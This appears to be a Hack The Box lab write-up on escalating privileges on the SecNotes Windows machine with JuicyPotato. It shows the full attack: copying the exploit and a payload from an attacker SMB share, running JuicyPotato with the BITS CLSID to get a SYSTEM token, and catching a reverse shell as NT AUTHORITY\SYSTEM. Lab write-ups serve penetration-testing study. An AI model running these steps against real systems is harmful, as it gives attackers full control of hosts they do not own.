InfoSec LAB

JuicyPotato

I found out that the user has SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege

Let’s go

Exploitation

PS C:\tmp> copy \\10.10.14.6\smb\JuicyPotato.x86.exe
PS C:\tmp> copy \\10.10.14.6\smb\pe.exe

I transferred the exploit and payload

C:\tmp>.\JuicyPotato.x86.exe 
JuicyPotato v0.1 
 
Mandatory args: 
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port
 
 
Optional args: 
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user

JuicyPotato provides a help menu

The command would be something like this below .\JuicyPotato.exe -t * -p "C:\tmp\pe.exe" -l 24492 -t to use both CreateProcessWithTokenW and CreateProcessAsUser -p to launch the payload (pe.exe) with a higher privilege upon successful exploitation -l to assign a random port number for COM server to connect to

PS C:\tmp> cmd /c C:\tmp\JuicyPotato.exe -t * -p "C:\tmp\pe.exe" -l 24492
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 24492
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
 
[+] CreateProcessWithTokenW OK

Exploit was a success. It create a new process with privileges of SYSTEM and executed the payload

┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ nnc 1234      
listening on [any] 1234 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.97] 60149
Windows PowerShell running as user SECNOTES$ on SECNOTES
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\WINDOWS\system32> whoami
nt authority\system
PS C:\WINDOWS\system32> hostname
SECNOTES
PS C:\WINDOWS\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::250
   IPv6 Address. . . . . . . . . . . : dead:beef::6832:cf76:958b:2105
   Temporary IPv6 Address. . . . . . : dead:beef::2d54:dd95:22b0:d056
   Link-local IPv6 Address . . . . . : fe80::6832:cf76:958b:2105%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.97
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
                                       10.10.10.2

System Level Compromise

InfoSec LAB

Explorer

SecNotes_Privilege_Escalation

JuicyPotato

Exploitation

Interactive Graph View

Table of Contents

Backlinks